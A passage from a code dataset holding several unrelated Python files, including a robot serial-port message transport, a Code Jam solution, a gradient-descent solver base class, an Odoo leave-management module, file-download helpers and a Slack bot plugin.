18/01/10\n# @todo Would be nice to support version translation in IP Servers, \n# however, that would require additional work to detect the\n# version that clients are using which is currently not supported\n# by the current framework.\n# @todo FIX encryption\n# @req clearpath.utils \\n\n# clearpath.horizon.messages \\n\n# clearpath.horizon.payloads \\n\n# pySerial [http://pyserial.sourceforge.net/] \\n\n# -- for Serial\n# @version 1.0\n#\n# @section USE\n#\n# The intended purpose of this module is to provide functionality to send\n# and receive Horizon messages over the various transports with minimal\n# knowledge of messages and no knowledge of message payloads. Further, as\n# some transports support a one-to-many connection scheme, this module also\n# provides message routing. Note that as this module implements the transports\n# as defined in the Horizon specification, there is no support for version\n# translation. If version translation is desired, refer to the module \n# clearpath.horizon.forward.\n#\n# @section HISTORY\n#\n# Versions 0.1 - 0.3 {Ryan Gariepy}\n# - Initial Creation as protocol.py\n#\n# Version 0.4 {Malcolm Robert}\n# - Moved to horizon_protocol.py\n# - Added protocol abstraction\n# - Added TCP/IP\n# - Added UDP\n# - Added logging\n# - Added version support\n# - Added Doxygen documentation\n# - Changed version scheme to match Horizon doc\n# - Horizon support for v0.4\n#\n# Version 0.5\n# - Horizon support for v0.5\n#\n# Version 0.6\n# - Moved to protocol.py\n# - Horizon support for v0.6\n# - Improved search for header in read\n# - Added TCP encryption\n#\n# Version 0.7\n# - Moved to transport.py\n# - Added Server transports\n# - Added IPv6 support\n# - Horizon support for v 0.1 - 0.7\n# - Python 2.6+ & 3.x compatible\n#\n# Version 0.8\n# - Horizon support for v 0.1 - 0.8\n#\n# Version 1.0\n# - Added one-to-many support\n# - Horizon support for v 0.1 - 1.0\n#\n# @section License\n# @copydoc public_license\n#\n# @defgroup hardware Hardware\n# @ingroup doc\n# \n# @copydoc serial\n#\n# If higher bandwidth communication is required, the protocol may also be \n# packaged verbatim within TCP/IP or UDP packets if desired, with one protocol \n# message per packet. The default Horizon port for TCP/UDP is 7284.\n#\n# @copydoc tcp\n#\n# @copydoc udp\n#\n\"\"\"Horizon Message Transport Controllers\n\n Copyright © 2010 Clearpath Robotics, Inc.\n All rights reserved\n \n Created: 17/03/10\n Authors: Ryan Gariepy & Malcolm Robert\n Version: 1.0\n \"\"\"\n\n\n# Required Clearpath Modules\nfrom .. import utils # Clearpath Utilities\nfrom . import messages # Horizon Protocol Message Definition\nfrom . import codes # Horizon Protocol Versions \n\n# Required Python Modules\nimport logging # Logging Utilities\nimport socket # UDP Port Control\nimport sys # Python Interpreter Functionality\nimport threading # Python Thread Support\nimport time # System Date & Time\nimport collections # deque\nimport math\nfrom select import select\n\n# Version Dependent Modules\ntry:\n import serial # Serial Port Control\nexcept ImportError:\n pass\n\nMessageRecord = collections.namedtuple('MessageRecord', 'message, expiry')\n\n\n# Module Support\n## Module Version\n__version__ = \"1.0\"\n\"\"\"Module Version\"\"\"\n## SVN Code Revision\n__revision__ = \"$Revision: 898 $\"\n\"\"\" SVN Code Revision\"\"\"\n\n\n## Message Log\nlogger = logging.getLogger('clearpath.horizon.transports')\n\"\"\"Horizon Transports Module Log\"\"\"\nlogger.setLevel(logging.NOTSET)\nlogger.addHandler(utils.NullLoggingHandler())\nlogger.propagate = False\nlogger.debug(\"Loading clearpath.horizon.transports ...\") \n\n\n\n\n################################################################################\n# Horizon Transport Controller\n\n\n\n## Transport\n#\nclass Transport(object):\n \"\"\"Horizon Transport Base Class\"\"\"\n pass\n\n\n## Horizon Serial Controller\n#\n# Provides a method to send and receive messages over RS-232. \\n\n# Guarantees order of arrival and arrival. \\n\n# Low Bandwidth use only.\n#\n# @req pySerial [http://pyserial.sourceforge.net/]\n# @since 0.1\n#\n# @pydoc\nclass Serial(Transport):\n \"\"\"Horizon Transport Controller - Serial Device\"\"\"\n \n def __init__(self, port = None, store_timeout = 0, receive_callback = None):\n \"\"\"Create A Horizon Serial Transport\"\"\"\n\n # Dependency check\n try:\n serial\n except NameError:\n logger.error(\"%s: Cannot create Horizon Serial Transport without\"\\\n \"pySerial!\" % self.__class__.__name__)\n raise utils.TransportError (\"pySerial not found!\")\n \n if port == None: \n raise utils.TransportError \\\n (\"Serial transport creation failed: port not specified!\\n\")\n\n # Class Variables\n self.port = port\n self._serial = None \n self._opened = False\n self.store_timeout = store_timeout\n self.receive_callback = receive_callback\n self.serial_write_lock = threading.Lock()\n\n # Initialization\n try:\n self._serial = serial.Serial()\n self._serial.port = port\n self._serial.baudrate = 115200\n self._serial.timeout = 0\n \n # Creation failed\n except serial.SerialException as ex:\n raise utils.TransportError \\\n (\"Serial Transport creation failed!\\n\" + str(ex))\n \n\n @classmethod\n def autodetect(cls, **kwargs):\n ports = utils.list_serial_ports()\n logger.info(\"%s: Attempting autodetect with %s.\" % \n (cls.__name__, ' '.join(ports)))\n\n for trynum in range(5):\n logger.info(\"%s: Autodetect try #%d.\" % \n (cls.__name__, trynum + 1))\n for port in ports:\n kwargs['port'] = port\n transport = cls(**kwargs)\n try:\n transport.open()\n return transport\n except utils.TransportError:\n # Not this one, move on.\n pass\n\n raise utils.TransportError(\"Unable to autodetect a serial Horizon device.\")\n \n\n def __str__(self):\n \"\"\"Return the transport device name.\"\"\"\n return self.port\n \n\n def open(self):\n if (not self._opened):\n logger.debug(\"%s: Beginning transport opening for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n\n try:\n self._serial.open()\n if not self._serial.isOpen():\n raise serial.SerialException\n except serial.SerialException:\n logger.debug(\"%s: Transport opening failed.\" % self.__class__.__name__)\n raise utils.TransportError(\"Serial Port opening failed.\")\n\n self._opened = True\n self.receiver = self.Receiver(self._serial, self.store_timeout, self.receive_callback)\n self.receiver.start()\n time.sleep(0.1)\n \n logger.debug(\"%s: Sending ping request.\" % (self.__class__.__name__))\n message = messages.Message.request('echo') \n try: \n self.send_message(message)\n except utils.TransportError as ex:\n # Must catch this for the sake of closing the serial port and also\n # killing the receiver thread.\n self.close()\n raise utils.TransportError(\"Serial Port message send failed.\\n\" + str(ex))\n \n logger.debug(\"%s: Ping request sent.\" % (self.__class__.__name__))\n\n for sleeping in range(5):\n time.sleep(0.1)\n waiting = self.receiver.get_waiting()\n for message in waiting:\n logger.debug(\"%s: Message received.\" % (self.__class__.__name__))\n if codes.names[message.code] == 'echo':\n # Success\n logger.debug(\"%s: Transport opened.\" % self.__class__.__name__)\n return\n \n logger.debug(\"%s: No response to ping request.\" % self.__class__.__name__)\n self.close()\n raise utils.TransportError(\"Could not communicate with Clearpath platform.\")\n\n\n def close(self):\n logger.debug(\"%s: Beginning transport closing for %s.\" %\n (self.__class__.__name__, self._serial.portstr))\n self.receiver.stop()\n self.receiver.join()\n self._serial.close()\n self._opened = False\n logger.debug(\"%s: Transport closed.\" % self.__class__.__name__)\n\n \n def is_open(self):\n return self._opened;\n\n\n def send_message(self, message):\n \"\"\"Serial Transport Device Send Horizon Message\"\"\"\n self.send_raw(utils.to_bytes(message.data()))\n\n\n def send_raw(self, raw):\n if not self._opened:\n raise utils.TransportError (\"Cannot send while closed!\")\n\n try:\n with self.serial_write_lock:\n try:\n getattr(serial, \"serial_for_url\")\n sent = self._serial.write(raw)\n if sent == None:\n raise utils.TransportError (\"Write Failed!\")\n\n except AttributeError:\n if sys.version_info[0] > 2:\n self._serial.write(list(map(chr, raw)))\n else:\n self._serial.write(raw)\n sent = len(raw)\n \n if sent < len(raw):\n raise utils.TransportError (\"Write Incomplete!\")\n \n # Send Failed\n except serial.SerialException as ex:\n raise utils.TransportError \\\n (\"Serial Message send failed!\\n\" + str(ex))\n\n\n class Receiver(threading.Thread):\n\n def __init__(self, serial, store_timeout, callback):\n threading.Thread.__init__(self, name = 'clearpath.horizon.transports.Serial.Receiver')\n self._running = False\n self._buffer = []\n self._serial = serial\n self._callback = callback\n self.start_time = time.time()\n self.store_timeout = store_timeout\n\n # Received Messages\n self._acks_lock = threading.Lock()\n self._acks = {} # Format: {timestamp: (MessageRecord)}\n self._received_lock = threading.Lock()\n self._received = collections.deque() # Format: MessageRecord\n\n # self.daemon = True\n\n\n def stop(self):\n self._running = False\n\n\n # Only for internal use by Receiver methods. These timestamps have nothing to\n # do with platform time or API time.\n def _timestamp(self):\n return math.floor((time.time() - self.start_time) * 1000)\n\n\n def get_waiting(self, code=0x0000):\n \"\"\"Horizon Protocol Get Waiting Messages\"\"\"\n msgs = []\n skip = collections.deque()\n with self._received_lock:\n try:\n while True:\n message_record = self._received.popleft()\n if code == 0 or message_record.message.code == code:\n msgs.append(message_record.message)\n else:\n skip.append(message_record) \n except IndexError:\n # No more items in the list\n pass\n\n # All the ones we didn't return throw back in the received bin\n self._received = skip\n return msgs\n\n\n def run(self):\n logger.debug(\"%s: Entering receive loop for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n self._running = True\n \n while self._running:\n # Block until serial data available\n rlist, _, _ = select([ self._serial ], [], [], 1.0)\n if not rlist:\n time.sleep(0.001)\n continue\n \n try:\n message = None\n message = self._get_message()\n if message != None:\n logger.debug(\"%s: received message:\\n %s\" % \\\n (self.__class__.__name__, str(message)))\n except IOError as ex: # TransportError\n # Silently swallow \n logger.warning(\n \"%s: IO error in attempting to retrieve message:\\n%s\" %\\\n (self.__class__.__name__, ex))\n except ValueError as ex: # ChecksumError\n # Silently swallow \n logger.info(\n \"%s: Value error in received message:\\n%s\" %\\\n (self.__class__.__name__, ex))\n \n # If it's a good message with a payload, handle it.\n if message != None and message.payload != None:\n if message.payload.__class__ == codes.payloads.Ack:\n # Mark the ack as received. It will be up to the main\n # thread to examine this for status and throw any necessary\n # exceptions.\n with self._acks_lock:\n # It's keyed to the message's baked-in timestamp, because that's how\n # acks are matched. But it's also stored beside the current time per\n # this computer, for the purposes of expiring it.\n self._acks[message.timestamp] = MessageRecord(message = message, \n expiry = self._timestamp() + \n self.store_timeout)\n\n elif self._callback != None and self._callback(message):\n # Okay, handled by asyncronous handlers.\n pass\n\n else:\n # Unhandled. Store it for synchronous access.\n with self._received_lock:\n self._received.append(MessageRecord(message = message, \n expiry = self._timestamp() + \n self.store_timeout))\n\n # Check timeouts\n current = self._timestamp()\n with self._received_lock: # stored messages\n try:\n while current > self._received[0].expiry:\n self._received.popleft()\n except IndexError:\n # No more items in list.\n pass\n with self._acks_lock: # stored acks\n for ts, message_record in list(self._acks.items()): \n if current > message_record.expiry:\n del self._acks[ts]\n\n logger.debug(\"%s: Exiting receive loop for %s.\" % \n (self.__class__.__name__, self._serial.portstr))\n \n def has_ack(self, timestamp):\n with self._acks_lock:\n if timestamp in self._acks:\n ack = self._acks[timestamp][0]\n del self._acks[timestamp]\n return ack\n else:\n return False\n\n\n def _get_message(self):\n read = 0\n\n # read as much as possible without blocking (as timeout = 0)\n chars = self._serial.read(1000)\n\n if len(chars) > 0:\n try:\n getattr(serial, \"serial_for_url\")\n if sys.version_info[0] > 2:\n self._buffer += chars\n else:\n self._buffer += list(map(ord,chars))\n except AttributeError:\n self._buffer += list(map(ord,chars))\n\n # Discard bytes from the buffer until we find a \n # SOH character followed by two characters which are\n # complements, representing the length.\n disc = []\n while(len(self._buffer) > 3 and (\n self._buffer[0] != messages.Message.SOH or\n self._buffer[1] != 0xFF & (~self._buffer[2]) or\n self._buffer[1] == 0)):\n disc.append(self._buffer.pop(0))\n\n if len(disc) > 0:\n logger.info(\"%s: Discarded %d bytes:\\n%s\" % (\n self.__class__.__name__, len(disc), \n ' '.join(map(utils.hex,disc))))\n\n if len(self._buffer) < 3:\n # Not enough data in the buffer read a SOH + LEN + ~LEN.\n return None\n \n length = self._buffer[1] + 3\n \n # Now know message length. Is there enough in the buffer yet to read\n # the whole message? If not, wait.\n if len(self._buffer) < length:\n return None\n \n # Create and return the Message\n raw = self._buffer[0:length]\n self._buffer = self._buffer[length:]\n logger.info(\"%s: Message of %d bytes found:\\n%s\" % (\n self.__class__.__name__, len(raw), \n ' '.join(map(utils.hex,raw))))\n\n # This will throw errors if has a bad checksum, for example,\n # which will bubble up to the run() function.\n return messages.Message.parse(raw)\n\n \n logger.debug(\"... clearpath.horizon.transports loaded.\")\n \n","sub_path":"src/clearpath/horizon/transports.py","file_name":"transports.py","file_ext":"py","file_size_in_byte":21583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"118062849","text":"import sys\n\nfd = open(sys.argv[1], 'r')\n\nncases = int(fd.readline()[:-1])\n\nfor case in range(1, ncases+1):\n word = fd.readline()[:-1]\n win = ''\n for char in word:\n if char >= win[:1]:\n win = char + win\n else:\n win = win + char\n\n print(\"Case #\" + str(case) + \":\", win)\n\n","sub_path":"codes/CodeJamCrawler/CJ_16_1/16_1_1_gabriellesc_lastWord.py","file_name":"16_1_1_gabriellesc_lastWord.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"335926511","text":"'''Gradient Descent Step'''\nimport numpy as np\nfrom numpy import linalg as LA\nfrom wolff.models.model import Model\nimport csv\n\nimport abc\n\n\nABC = abc.ABCMeta('ABC', (object,), {})\n\n\nclass GradientDescentSolver(ABC):\n def __init__(self,\n dtheta=0.1,\n theta_0=0.0,\n grids_true=[],\n elapsed_times_true=[],\n theta_min=-np.inf,\n theta_max=np.inf,\n epsilon=1e-6,\n max_iters=1000,\n learning_rate=0.01,\n print_output=False,\n output_file=None):\n\n self.dtheta = dtheta\n self.theta_0 = theta_0\n self.grids_true = grids_true\n self.elapsed_times_true = elapsed_times_true\n self.theta_min = theta_min\n self.theta_max = theta_max\n self.epsilon = epsilon\n self.max_iters = max_iters\n self.learning_rate = learning_rate\n self.print_output = print_output\n self.output_file = output_file\n\n self._model = None\n self._constants_0 = []\n\n @property\n def dtheta(self):\n return self._dtheta\n\n @dtheta.setter\n def dtheta(self, value):\n self._dtheta = value\n\n @property\n def theta_0(self):\n return self._theta_0\n\n @theta_0.setter\n def theta_0(self, value):\n self._theta_0 = value\n\n @property\n def grids_true(self):\n return self._grids_true\n\n @grids_true.setter\n def grids_true(self, value):\n self._grids_true = list(value)\n\n @property\n def elapsed_times_true(self):\n return self._elapsed_times_true\n\n @elapsed_times_true.setter\n def elapsed_times_true(self, value):\n self._elapsed_times_true = list(value)\n\n @property\n def theta_max(self):\n return self._theta_max\n\n @theta_max.setter\n def theta_max(self, value):\n self._theta_max = value\n\n @property\n def theta_min(self):\n return self._theta_min\n\n @theta_min.setter\n def theta_min(self, value):\n self._theta_min = value\n\n @property\n def epsilon(self):\n return self._epsilon\n\n @epsilon.setter\n def epsilon(self, value):\n if value <= 0:\n raise ValueError('Epsilon must be greater than zero')\n self._epsilon = value\n\n @property\n def max_iters(self):\n return self._max_iters\n\n @max_iters.setter\n def max_iters(self, value):\n if value <= 0:\n raise ValueError('Maximum iterations must be greater than zero')\n self._max_iters = value\n\n @property\n def learning_rate(self):\n return self._learning_rate\n\n @learning_rate.setter\n def learning_rate(self, value):\n if value <= 0:\n raise ValueError('Learning rate must be greater than zero')\n self._learning_rate = value\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, value):\n if not isinstance(value, Model):\n raise TypeError(\"Must provide wolff.models.model.Model subclass\")\n self._model = value\n\n @property\n def constants_0(self):\n return self._constants_0\n\n @property\n def print_output(self):\n return self._print_output\n\n @print_output.setter\n def print_output(self, value):\n self._print_output = value\n\n @property\n def output_file(self):\n return self._output_file\n\n @output_file.setter\n def output_file(self, value):\n self._output_file = value\n\n @property\n def iters(self):\n return self._iters\n\n @property\n def error(self):\n return self._error\n\n def simulate(self):\n if self.theta_0 is None:\n raise RuntimeError('No parameters have been set')\n if self.model is None:\n raise RuntimeError('No model has been set')\n if self.theta_max < self.theta_min:\n raise RuntimeError('theta_max must be greater than theta_min')\n if not self.output_file.lower().endswith('.csv') and \\\n self.output_file is not None:\n raise RuntimeError('Output file must be .csv')\n\n self._iters = 0\n self._error = np.inf\n self._theta = self._theta_0\n\n self._constants = self._constants_0\n\n self._model.grids_true = self._grids_true\n self._model.elapsed_times_true = self._elapsed_times_true\n self._model.dtheta = self._dtheta\n self._model.theta = self._theta\n self._model.process(self.grid)\n\n self._error = LA.norm(self._model.J)\n\n self.Print()\n\n if self._output_file is not None:\n\n with open(self.output_file, mode='w') as initial:\n fieldnames = ['Iteration', 'theta', 'error']\n writer = csv.DictWriter(initial, fieldnames=fieldnames)\n\n writer.writeheader()\n writer.writerow({'Iteration': '{}'.format(self._iters),\n 'theta': '{}'.format(self._theta),\n 'error': '{}'.format(self._error)})\n\n while not self.halt():\n\n self._iters += 1\n\n self.next_theta()\n\n self._theta = np.clip(self._theta,\n self._theta_min,\n self._theta_max)\n\n self._model.theta = self._theta\n self._model.process(self.grid)\n\n self._error = LA.norm(self._model.J)\n\n if self._output_file is not None:\n\n with open(self._output_file, 'a+', newline='') as append:\n fieldnames = ['Iteration', 'theta', 'error']\n append_writer = csv.DictWriter(append,\n fieldnames=fieldnames)\n\n append_writer.writerow(\n {'Iteration': '{}'.format(self._iters),\n 'theta': '{}'.format(self._theta),\n 'error': '{}'.format(self._error)})\n\n self.Print()\n\n return self._theta\n\n def halt(self):\n return (self._error < self._epsilon) or (self._iters > self._max_iters)\n\n def Print(self):\n if self._print_output:\n print('Iteration {}: error = {}\\t theta = {}'.\n format(self._iters, self._error, self._theta))\n\n def __call__(self):\n return self.next_theta()\n\n @abc.abstractmethod\n def next_theta(self):\n pass\n","sub_path":"wolff/optimization/gradient_descent_solver.py","file_name":"gradient_descent_solver.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"11820077","text":"SYSTEM_ERROR = -1\nDATABASE_CONNECTION_ERROR = -2\nREDIS_CONNECTION_ERROR = -3\nFROM_DICT_TO_XML_CONVERSION_ERROR = -5\nFROM_XML_TO_DICT_CONVERSION_ERROR = -6\nSAVE_XML_ERROR = -7\nDATE_PARSE_ERROR = -8\nNO_REQUIRED_PARAM = -9\nOBJECT_DOES_NOT_EXIST = -10\nOK = 0\nNO_TRANSFERS = -13\nINVALID_PASS = -14\nNOT_AUTHORIZED = -15\nUSER_BLOCKED = -16\nACCESS_DENIED = -17\nUNKNOWN_METHOD = -18\nINVALID_REQUISITE = -22\nGNS_DISABLED_REGION = -110\nGNS_WRONG_VEHICLE_NUM = -111\nSF_DISABLED_REGION = -112\nSP_RESPONSE_ERROR = -500\nSP_SEND_REQUEST_ERROR = -501\nSERVICE_CONFIG_ERROR = -100\nABS_SERVER_UNAVAILABLE = -101\n\nMESSAGES = {\n 'ru': {\n OK: 'ok',\n NO_TRANSFERS: 'Нет трансферов',\n SYSTEM_ERROR: 'Системная ошибка, попробуйте позже',\n INVALID_PASS: 'Неверное имя пользователя или пароль',\n NOT_AUTHORIZED: 'Сессия закрыта',\n USER_BLOCKED: 'Доступ заблокирован!',\n ACCESS_DENIED: 'Доступ заблокирован!',\n FROM_DICT_TO_XML_CONVERSION_ERROR: (\n 'Ошибка конвертирования от Dictionary к XML'\n ),\n FROM_XML_TO_DICT_CONVERSION_ERROR: (\n 'Ошибка конвертирования от XML к Dictionary',\n ),\n SAVE_XML_ERROR: 'Ошибка при сохранении XML',\n DATABASE_CONNECTION_ERROR: 'Ошибка соединения с базой данных',\n REDIS_CONNECTION_ERROR: 'Ошибка соединения с Redis',\n DATE_PARSE_ERROR: 'Формат даты некорректный',\n INVALID_REQUISITE: 'Неверный реквизит',\n NO_REQUIRED_PARAM: 'отсутсвует обязательный параметр',\n OBJECT_DOES_NOT_EXIST: 'Запрашиваемого обьекта в БД не существует',\n GNS_DISABLED_REGION: 'По выбранному району оплата не возможна.',\n GNS_WRONG_VEHICLE_NUM: 'Неверный номер транспорта!',\n SF_DISABLED_REGION: (\n 'Прием платежей от ИП за Октябрьского и Сокулукского '\n 'районов осуществляется в ГНС при ПКР.',\n ),\n SP_RESPONSE_ERROR: 'Ошибка! Ответ от сервера не успешно',\n SP_SEND_REQUEST_ERROR: 'Ошибка при запросе в сервер провайдера',\n UNKNOWN_METHOD: 'Неверный метод',\n SERVICE_CONFIG_ERROR: 'Неверное значение в запросе',\n ABS_SERVER_UNAVAILABLE: 'Сервер АБС не доступен',\n },\n 'en': {},\n 'kg': {},\n}\n","sub_path":"controller/codes.py","file_name":"codes.py","file_ext":"py","file_size_in_byte":2808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"200122046","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\nfrom dateutil import relativedelta\nimport datetime\nfrom odoo.exceptions import ValidationError\n\n\nclass CustomLeave(models.Model):\n _inherit = 'hr.leave.type'\n _description = 'Custom Leaves'\n\n custom_leave = fields.Boolean(string=\"Custom Leave\", default=False)\n fixed_period = fields.Float(string=\"Fixed Period\", default=1)\n only_time_granted = fields.Boolean(string=\"Only time Granted\", default=False)\n applicable_for = fields.Selection(\n [('both', 'Both'),\n ('female', 'Female')], string=\"Applicable For\", default='both')\n allocated_method = fields.Selection(\n [('manual', 'Manual'),\n ('auto', 'Automated')], string=\"Allocated Method\", default='manual')\n automated_allocation = fields.Selection([('based', 'Based on Experience'), ('custom', 'Custom Period')],\n default='based')\n number_per_interval = fields.Float(\"Number of unit per interval\", default=1)\n interval_number = fields.Integer(\"Number of unit between two intervals\", default=1)\n unit_per_interval = fields.Selection([\n ('days', 'Day(s)')\n ], string=\"Unit of time added at each interval\", default='days')\n interval_unit = fields.Selection([\n ('months', 'Month'),\n ('years', 'Year')\n ], string=\"Unit of time between two intervals\", default='months')\n date_to = fields.Date()\n\n\nclass AddAttachment(models.Model):\n _inherit = 'hr.leave'\n _description = 'Add Attachment'\n\n attachment = fields.Many2many('ir.attachment', string=\"Attachment\", copy=False)\n cus_level = fields.Boolean(string=\"cus level\", related='holiday_status_id.custom_leave')\n\n\n def action_approve(self):\n res = super(AddAttachment, self).action_approve()\n if self.holiday_status_id.custom_leave == True and self.holiday_status_id.applicable_for == 'both' and self.holiday_status_id.only_time_granted == True:\n if self.employee_id.employee_time_granted == False:\n self.employee_id.employee_time_granted = True\n return res\n \n @api.constrains('holiday_status_id')\n def _check_holiday_custom(self):\n for rec in self:\n # for leaves die only\n if (rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'both' and rec.holiday_status_id.only_time_granted == False):\n if rec.employee_id.gender == 'male' or rec.employee_id.gender == 'female':\n if rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n # for wedding and hej\n elif ( rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'both' and rec.holiday_status_id.only_time_granted == True ) :\n if rec.employee_id.gender == 'male' or rec.employee_id.gender == 'female':\n if rec.employee_id.employee_time_granted == True:\n raise ValidationError(_(\"This type only time granted \"))\n elif rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n\n # for women only\n elif rec.holiday_status_id.custom_leave == True and rec.holiday_status_id.applicable_for == 'female':\n if rec.employee_id.gender == 'female':\n if rec.number_of_days > rec.holiday_status_id.fixed_period:\n raise ValidationError(_(\"Duration must be \") + str(rec.holiday_status_id.fixed_period))\n elif rec.employee_id.gender != 'female':\n raise ValidationError(_(\"This leave Applicable for only Female\"))\n\n\nclass HrAllocation(models.Model):\n _inherit = 'hr.leave.allocation'\n\n @api.model\n def create_employee_allocation(self):\n Employees = self.env['hr.employee'].search([])\n Timeeofftyp = self.env['hr.leave.type'].search(\n [('allocated_method', '=', 'auto'), ('automated_allocation', '=', 'based')], limit=1)\n today = datetime.datetime.today()\n t_today = today.day\n t_month = today.month\n for employee in Employees:\n if employee.contract_id.state == 'open':\n started_date = datetime.datetime.strptime(\n employee.started_date.strftime('%Y-%m-%d'), '%Y-%m-%d')\n s_today = started_date.day\n s_month = started_date.month\n if t_today == s_today and t_month == s_month:\n allocation_vals = {\n 'name': _('Annual Leave for ') + employee.name,\n 'holiday_status_id': Timeeofftyp.id,\n 'allocation_type': 'regular',\n 'holiday_type': 'employee',\n 'number_of_days': employee.legal_leave_monthly_allocation,\n 'employee_id': employee.id\n }\n self.env['hr.leave.allocation'].create(allocation_vals)\n\n","sub_path":"time_off_custom_leave/models/custom_leave.py","file_name":"custom_leave.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"108696669","text":"import copy\nimport urllib\nfrom math import inf\nfrom urllib.request import urlopen, Request\n\nimport os\nimport requests\nfrom selenium import webdriver\nfrom selenium.common.exceptions import TimeoutException\n\nfrom src.DownloadStatistics import DownloadStatistics\nfrom src.log import log\n\n\nfriendly_user_agent = \\\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'\n # 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'\n\nKILO = 2**10\nMEGA = 2**20\nSOUP_PARSER_HTML = 'html.parser'\nCONTENT_LENGTH = 'content-length'\n\n\ndef make_safe_url(url):\n return urllib.parse.quote(url, safe='$-_.+!*\\'(),;/?:@=&%')\n\n\ndef fetch_url(url, headers=None, return_bytes=False):\n # log('fetching {}'.format(url))\n headers = make_headers_with_user_agent(headers)\n req = Request(url, headers=headers)\n with urlopen(req) as page:\n response = page.read()\n if return_bytes:\n return response\n else:\n return str(response)\n\n\ndef make_headers_with_user_agent(headers):\n if headers is None:\n headers = dict()\n headers['User-Agent'] = friendly_user_agent\n return headers\n\n\ndef get_absolute_url(domain, relative_url):\n return \"{}/{}\".format(domain, relative_url)\n\n\ndef generate_chrome_driver():\n options = webdriver.ChromeOptions()\n # no junk output in console\n options.add_argument('log-level=3')\n\n options.add_argument(\"--mute-audio\")\n options.add_argument(\"--incognito\")\n # options.add_argument(\"--enable-devtools-experiments\")\n options.add_argument(\"--disable-extensions\")\n options.add_argument(\"--headless\")\n\n capabilities = webdriver.DesiredCapabilities.CHROME\n # capabilities['javascriptEnabled'] = True\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capabilities)\n return driver\n\n\ndef driver_timeout_get_url(driver, url):\n try:\n driver.get(url)\n except TimeoutException:\n pass\n return\n\n\ndef __draw_progressbar(done, total, report_string_format, progress_bar_length=30):\n bar_done = '#' * int(progress_bar_length * done/total)\n bar_left = '-' * int(progress_bar_length * (total - done)/total)\n percentage = done/total\n print('\\r' + report_string_format.format(bar=bar_done + bar_left, percentage=percentage), end='')\n return\n\n\ndef my_reporthook(count, block_size, total, download_statistics):\n download_statistics.report_block_downloaded(block_size)\n\n done_megabytes = count * block_size / MEGA\n speed_megabytes = download_statistics.get_speed() / MEGA\n info_report_string = '\\t{speed:.2f}MBps'\n\n if total is not None:\n size_megabytes = total / MEGA\n estimated = ((size_megabytes - done_megabytes)/speed_megabytes if speed_megabytes != 0 else inf) / 60\n info_report_string += '\\t{done:.2f}/{total_size:.2f} (MB)\\tEst: {estimated:.2f} minutes'\n else:\n size_megabytes = '?'\n estimated = '?'\n info_report_string += '\\t{done:.2f}/{total_size} (MB)\\tEst: {estimated} minutes'\n\n info_report_string = info_report_string.format(speed=speed_megabytes,\n done=done_megabytes,\n total_size=size_megabytes,\n estimated=estimated)\n\n if total is not None:\n __draw_progressbar(count * block_size,\n total,\n '[{bar}]{percentage:.2%}' + info_report_string,\n progress_bar_length=50)\n else:\n print('\\r' + info_report_string, end='')\n return\n\n\ndef download_file(url, file_path, headers=None):\n log('downloading: {} -> {}'.format(url, file_path))\n url = make_safe_url(url)\n headers = make_headers_with_user_agent(headers)\n\n download_statistics = DownloadStatistics()\n response = requests.get(url, stream=True, headers=headers)\n chunk_size = 4096\n if CONTENT_LENGTH in response.headers.keys():\n total_size = int(response.headers[CONTENT_LENGTH])\n else:\n total_size = None\n with open(file_path, 'wb') as outfile:\n for i, data in enumerate(response.iter_content(chunk_size=chunk_size)):\n outfile.write(data)\n my_reporthook(i, chunk_size, total_size, download_statistics)\n\n # urlretrieve(url=url, filename=file_path, reporthook=my_reporthook, data=headers)\n print()\n log('finished downloading {}'.format(file_path))\n return\n\n\ndef download_file_from_multiple_sources(urls, path, headers=None):\n log('downloading {} from multiple urls'.format(path))\n # if not os.path.exists(path):\n # os.makedirs(path)\n\n headers = make_headers_with_user_agent(headers)\n with open(path, 'wb') as f:\n for i, url in enumerate(urls):\n # file_name = url[url.rfind('/') + 1:]\n # file_path = os.path.join(path, file_name)\n f.write(fetch_url(url, headers=headers, return_bytes=True))\n print('\\r{}/{}...'.format(i, len(urls)), end='')\n print()\n log('finished downloading {}'.format(path))\n return\n","sub_path":"BrowseUtils.py","file_name":"BrowseUtils.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"608305247","text":"\"\"\"http://www.iphones.ru/tracer/... will return meta information about page\"\"\"\nimport re\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport httplib2 \n\ndef get_meta(url):\n http = httplib2.Http()\n headers, body = http.request(url)\n soup = BeautifulSoup(body, 'html.parser')\n meta = (u\"{0}\").format(soup.title.string)\n \n return meta \n\ndef on_message(msg, server):\n text = msg.get(\"text\", \"\")\n match = re.findall(r\"(?:http:\\/\\/(www)?\\.iphones\\.ru\\/tracer\\/)(.+)\", text)\n if not match:\n return\n\n return get_meta(\"http://www.iphones.ru/tracer/\" + 